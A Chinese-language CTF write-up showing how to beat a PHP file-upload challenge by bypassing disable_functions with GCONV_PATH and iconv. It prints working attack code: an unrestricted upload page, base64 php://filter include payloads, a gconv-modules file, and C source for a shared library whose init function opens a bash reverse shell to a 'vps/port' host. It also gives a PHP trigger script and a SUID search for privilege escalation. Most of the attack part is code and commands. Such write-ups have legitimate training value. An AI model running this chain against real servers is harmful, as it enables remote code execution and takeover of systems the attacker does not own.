-
考察点:利用
GCONV_PATH
与iconv
绕过disable_function
限制 -
使用GCONV_PATH与iconv进行bypass disable_functions_gconv-modules-CSDN博客
-
题目分析:
- 题目显示上传文件,随便上传了一个
txt
文件显示:
- 题目显示上传文件,随便上传了一个
-
要求上传
php
文件,构造文件内容<?php phpinfo();?>
上传,查看信息 -
发现过滤了特别多的函数,需要进行
disable_function
绕过。php
版本为8.0.1
,因此使用antsword
绕过是不行的;此外,show_source
,include
,base64
等函数是没有被过滤的,可以用show_source
查看index.php
源码,构造文件内容<?php Show_source('/var/www/html/index.php');?>
上传(show_source
被waf
了,用大写绕过),查看信息:// index.php源码 <div class="light"><span class="glow"> <form enctype="multipart/form-data" method="post" onsubmit="return checkFile()"> 嘿伙计,传个火?! <input class="input_file" type="file" name="upload_file"/> <input class="button" type="submit" name="submit" value="upload"/> </form> </span><span class="flare"></span><div> <?php function fun($var): bool{ $blacklist = ["\$_", "eval","copy" ,"assert","usort","include", "require", "$", "^", "~", "-", "%", "*","file","fopen","fwriter","fput","copy","curl","fread","fget","function_exists","dl","putenv","system","exec","shell_exec","passthru","proc_open","proc_close", "proc_get_status","checkdnsrr","getmxrr","getservbyname","getservbyport", "syslog","popen","show_source","highlight_file","`","chmod"]; // 内容限制 foreach($blacklist as $blackword){ if(strstr($var, $blackword)) return True; } return False; } error_reporting(0); //设置上传目录 define("UPLOAD_PATH", "./uploads"); $msg = "Upload Success!"; if (isset($_POST['submit'])) { $temp_file = $_FILES['upload_file']['tmp_name']; $file_name = $_FILES['upload_file']['name']; $ext = pathinfo($file_name,PATHINFO_EXTENSION); if(!preg_match("/php/i", strtolower($ext))){ die("只要好看的php"); // 后缀限制 } $content = file_get_contents($temp_file); if(fun($content)){ die("诶,被我发现了吧"); } $new_file_name = md5($file_name).".".$ext; $img_path = UPLOAD_PATH . '/' . $new_file_name; if (move_uploaded_file($temp_file, $img_path)){ $is_upload = true; } else { $msg = 'Upload Failed!'; die(); } echo '<div style="color:#F00">'.$msg." Look here~ ".$img_path."</div>"; }
-
index.php
限制了我们上传文件的类型,想通过GCONV_PATH
与iconv
绕过disable_function
就必须绕过文件上传后缀限制,因此我们需要自己构造后缀无限制的文件上传界面。需要两步:-
1、构造无限制后缀上传
php
文件,可以根据题目的源码进行魔改。文件内容上传时需要base64
编码,绕过index.php
对文件内容的检测。// base64upload.php <div class="light"><span class="glow"> <form enctype="multipart/form-data" method="post" onsubmit="return checkFile()"> 嘿伙计,传个火?! <input class="input_file" type="file" name="upload_file"/> <input class="button" type="submit" name="submit" value="upload"/> </form> </span><span class="flare"></span><div> <?php error_reporting(0); //设置上传目录 define("UPLOAD_PATH", "/tmp"); $msg = "Upload Success!"; if (isset($_POST['submit'])) { $temp_file = $_FILES['upload_file']['tmp_name']; $file_name = $_FILES['upload_file']['name']; $img_path = UPLOAD_PATH . '/' . $file_name; if (move_uploaded_file($temp_file, $img_path)){ $is_upload = true; } else { $msg = 'Upload Failed!'; die(); } echo '<div style="color:#F00">'.$msg." Look here~ ".$img_path."</div>"; } // PGRpdiBjbGFzcz0ibGlnaHQiPjxzcGFuIGNsYXNzPSJnbG93Ij4KPGZvcm0gZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbWV0aG9kPSJwb3N0IiBvbnN1Ym1pdD0icmV0dXJuIGNoZWNrRmlsZSgpIj4KICAgIOWYv+S8meiuoe+8jOS8oOS4queBq++8n++8gQogICAgPGlucHV0IGNsYXNzPSJpbnB1dF9maWxlIiB0eXBlPSJmaWxlIiBuYW1lPSJ1cGxvYWRfZmlsZSIvPgogICAgPGlucHV0IGNsYXNzPSJidXR0b24iIHR5cGU9InN1Ym1pdCIgbmFtZT0ic3VibWl0IiB2YWx1ZT0idXBsb2FkIi8+CjwvZm9ybT4KPC9zcGFuPjxzcGFuIGNsYXNzPSJmbGFyZSI+PC9zcGFuPjxkaXY+Cjw/cGhwCmVycm9yX3JlcG9ydGluZygwKTsKLy/orr7nva7kuIrkvKDnm67lvZUKZGVmaW5lKCJVUExPQURfUEFUSCIsICIvdG1wIik7CiRtc2cgPSAiVXBsb2FkIFN1Y2Nlc3MhIjsKaWYgKGlzc2V0KCRfUE9TVFsnc3VibWl0J10pKSB7CiR0ZW1wX2ZpbGUgPSAkX0ZJTEVTWyd1cGxvYWRfZmlsZSddWyd0bXBfbmFtZSddOwokZmlsZV9uYW1lID0gJF9GSUxFU1sndXBsb2FkX2ZpbGUnXVsnbmFtZSddOwoKJGltZ19wYXRoID0gVVBMT0FEX1BBVEggLiAnLycgLiAkZmlsZV9uYW1lOwoKICAgIGlmIChtb3ZlX3VwbG9hZGVkX2ZpbGUoJHRlbXBfZmlsZSwgJGltZ19wYXRoKSl7CiAgICAgICAgJGlzX3VwbG9hZCA9IHRydWU7CiAgICB9IGVsc2UgewogICAgICAgICRtc2cgPSAnVXBsb2FkIEZhaWxlZCEnOwogICAgICAgIGRpZSgpOwogICAgfQogICAgZWNobyAnPGRpdiBzdHlsZT0iY29sb3I6I0YwMCI+Jy4kbXNnLiIgTG9vayBoZXJlfiAiLiRpbWdfcGF0aC4iPC9kaXY+IjsKfQ== // 路径 ./uploads/ee69fd8184001342fbd3f643aa86edb6.php
-
2、构造
include
函数php
文件,去包含我们第一步上传的文件,并且base64
解码,就能够达到任意文件上传的目的了。// includeupload.php <?php Include(base64_decode("cGhwOi8vZmlsdGVyL3JlYWQ9Y29udmVydC5iYXNlNjQtZGVjb2RlL3Jlc291cmNlPWVlNjlmZDgxODQwMDEzNDJmYmQzZjY0M2FhODZlZGI2LnBocA=="));?> // 路径:/uploads/e575807ac6647c61b2b5a54dd8d338c6.php
-
-
现在进行利用
GCONV_PATH
与iconv
绕过disable_function
的文件准备-
1、准备
gconv-modules
文件,并利用我们构造的任意文件上传页面,上传到/tmp
下,文件内容:module MGG// INTERNAL ../../../../../../../../tmp/mgg 2 module INTERNAL MGG// ../../../../../../../../tmp/mgg 2
-
2、准备
mgg.so
文件,首先在mgg.c
中编写如下内容:#include <stdio.h> #include <stdlib.h> void gconv() {} void gconv_init() { system("bash -c 'exec bash -i >& /dev/tcp/vps/port 0>&1'"); }
-
3、在终端中输入命令:
gcc mgg.c -o mgg.so -shared -fPIC
,然后将mgg.so
文件上传到/tmp
下
-
4、准备
shell.php
,base64
编码后上传,然后通过includeshell.php
去包含,但是出错了,查看phpinfo
,发现iconv
被禁了,只能换其他方式触发// shell.php <?php putenv("GCONV_PATH=/tmp/"); iconv("mgg", "UTF-8", "whatever"); ?> // 路径 25a452927110e39a345a2511c57647f2.php // includeshell.php <?php Include(base64_decode("cGhwOi8vZmlsdGVyL3JlYWQ9Y29udmVydC5iYXNlNjQtZGVjb2RlL3Jlc291cmNlPTI1YTQ1MjkyNzExMGUzOWEzNDVhMjUxMWM1NzY0N2YyLnBocA=="));?> // 路径1e106be92d196c433f803f11c16e534c.php
-
5、除了直接使用
iconv
函数可以触发刚刚的两个恶意文件,php:filter
里的iconv
转换过滤器也可以触发,修改shell.php
的内容,base64
编码后上传,然后通过includeshell.php
去包含<?php putenv("GCONV_PATH=/tmp/"); include('php://filter/read=convert.iconv.mgg.utf-8/resource=/tmp/mgg.so'); ?>
-
6、成功拿到
shell
,但是查了flag权限不够哦,需要提权,输入find / -perm -u=s -type f 2>/dev/null
查找具有SUID
权限的文件,发现nl
、使用nl
查看即可
-